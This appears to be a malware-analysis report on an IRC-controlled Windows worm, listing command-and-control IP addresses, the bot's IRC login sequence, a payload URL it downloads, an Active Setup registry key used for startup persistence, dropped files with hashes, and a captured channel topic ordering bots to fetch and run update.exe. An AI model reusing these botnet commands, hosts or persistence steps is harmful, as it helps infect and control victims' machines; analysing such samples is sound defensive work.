Remote Host Port Number
174.143.212.148 6667
66.45.237.212 80
* The data identified by the following URL was then requested from the remote web server:
o http://accf0ur.t35.com/03.jpeg
NICK VirUs-oqgsnaxa
USER VirUs “” “mqo” :
8Coded
8VirUs..
JOIN #OgarD3# Virus
PRIVMSG #OgarD3# :Success.
PASS Virus
Registry Modifications
* The following Registry Key was created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-61WE-AAX2-5657QWE232788}
* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-61WE-AAX2-5657QWE232788}]
+ StubPath = “c:A1V1try.exe”
so that try.exe runs every time Windows starts
* The following directories were created:
o c:A1
o c:A1V1
o c:Driver
o c:DriverFiles
File System Modifications
* The following files were created in the system:
# Filename(s) File Size File Hash Alias
1 c:A1V1DesKTop.ini
c:DriverFilesDesktop.ini 62 bytes MD5: 0x7457A5DF1FF47C957ACF1FA000D7D9AD
SHA-1: 0x69D2BBA827FD4DE0169419A0FDA280252B348514 (not available)
2 c:A1V1try.exe
%UserProfile%update.exe 57 344 bytes MD5: 0x03C8D742E98242F3C9FAD6FABF04F1F5
SHA-1: 0xFE880C737A3AC4BACEF7C9E0DF4585CB9D4739A2 (not available)
3 [file and pathname of the sample #1] 151 552 bytes MD5: 0xDCFF4516D75ADFB7183C7654C5E6AF26
SHA-1: 0x7A7CD45693781A861DB406990AA6AA239293E278 Worm.Win32.AutoRun.gap [Kaspersky Lab]
Win-Trojan/Buzus.106496.C
Invisible Users: 18479
Channels: 13 channels formed
Clients: I have 18490 clients and 0 servers
Local users: Current Local Users: 18490 Max: 23429
Global users: Current Global Users: 18490 Max: 23429
Now talking in #OgarD3#
Topic On: [ #OgarD3# ] [ !NAZELramzey http://accf0ur.t35.com/03.jpeg update.exe 2 ]
Topic By: [ OgarDtheLegenD ]
Modes On: [ #OgarD3# ] [ +smntMu ]